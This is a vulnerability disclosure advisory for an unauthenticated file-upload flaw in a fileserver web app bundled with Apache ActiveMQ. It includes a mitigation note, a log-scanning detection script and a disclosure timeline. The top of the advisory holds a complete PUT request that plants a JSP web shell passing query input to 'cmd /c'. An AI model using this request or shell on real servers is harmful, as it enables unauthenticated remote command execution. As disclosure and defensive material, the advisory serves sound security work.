This vulnerability can be chained with another vulnerability to allow fully unauthenticated remote attackers to execute arbitrary commands on the server running the vulnerable software as NT AUTHORITY\SYSTEM.
PUT /fileserver/stage1.jsp HTTP/1.1
Host: $IPADDR:8161
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 536

<%@ page import="java.util.*,java.io.*,java.net.*"%>
<html>
<head><title>TEST PAGE</title></head>
<body>
<%
try {
Process proc = java.lang.Runtime.getRuntime().exec(URLDecoder.decode("cmd /c " + request.getQueryString().split("=")[1].toString()));
java.io.BufferedReader stdInput = new java.io.BufferedReader(new java.io.InputStreamReader(proc.getInputStream()));
String s = null;
while ((s = stdInput.readLine()) != null) {
out.println(s);
}
} catch (Exception e) { out.println(e.toString()); }
%>
</body>
</html>
Vulnerability Description:
The Fileserver web app installed in C:\Klarity\Apache_ActiveMQ\webapps\fileserver\ from version 3.6.0.35 has a flaw that allows an unauthenticated remote attacker to drop files into the fileserver\ directory with a PUT request to http://$IP:8161/fileserver. This vulnerability can be chained with another vulnerability to allow fully unauthenticated remote attackers to execute arbitrary commands on the server running the vulnerable software as NT AUTHORITY\SYSTEM.

Proof of Concept:
Send the unauthenticated PUT request shown at the top of this page to the server running the software.
Verify that the file now exists in the fileserver\ directory.

Mitigation:
If possible, remove the C:\Klarity\Apache_ActiveMQ\webapps\fileserver folder entirely.
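Where the folder cannot be removed immediately, the web server's request log can be reviewed for the upload described above. The following is an added example, not part of the original advisory: it assumes the service on port 8161 writes an NCSA-style access log, and the sample lines, status codes and extension list are constructed for illustration.

```python
import re
from urllib.parse import unquote

# NCSA-style line: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
SCRIPT_EXT = (".jsp", ".jspx")  # assumed list of server-executable extensions

# Constructed sample lines (addresses, times and status codes are illustrative).
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2021:10:01:02 +0000] "PUT /fileserver/stage1.jsp HTTP/1.1" 204 0
203.0.113.7 - - [12/May/2021:10:01:09 +0000] "PUT /fileserver/notes.txt HTTP/1.1" 204 0
198.51.100.4 - - [12/May/2021:10:02:00 +0000] "GET /admin/queues.jsp HTTP/1.1" 401 0
198.51.100.9 - - [12/May/2021:10:03:00 +0000] "PUT //fileserver/t%65st.JSP HTTP/1.1" 404 0
"""


def classify(line):
    """Return a finding for a PUT under /fileserver, or None for other traffic."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "PUT":
        return None
    # Drop the query string, decode percent-escapes, collapse "//", ignore case.
    path = re.sub(r"/+", "/", unquote(m["target"].split("?", 1)[0])).lower()
    if path != "/fileserver" and not path.startswith("/fileserver/"):
        return None
    if not m["status"].startswith("2"):
        severity = "low"       # upload attempt that the server rejected
    elif path.endswith(SCRIPT_EXT):
        severity = "high"      # server-side page written under fileserver
    else:
        severity = "medium"    # unauthenticated write of any other file
    return {"host": m["host"], "time": m["time"], "path": path,
            "status": int(m["status"]), "severity": severity}


def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

Any "high" finding should be followed by a check of the fileserver\ directory for the named file, as in the verification step above.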
Timeline:
Disclosed: May 12, 2021
Acknowledged: May 13, 2021
Fixed: N/A
No fix from vendor in the Vulnerability Disclosure Program timeline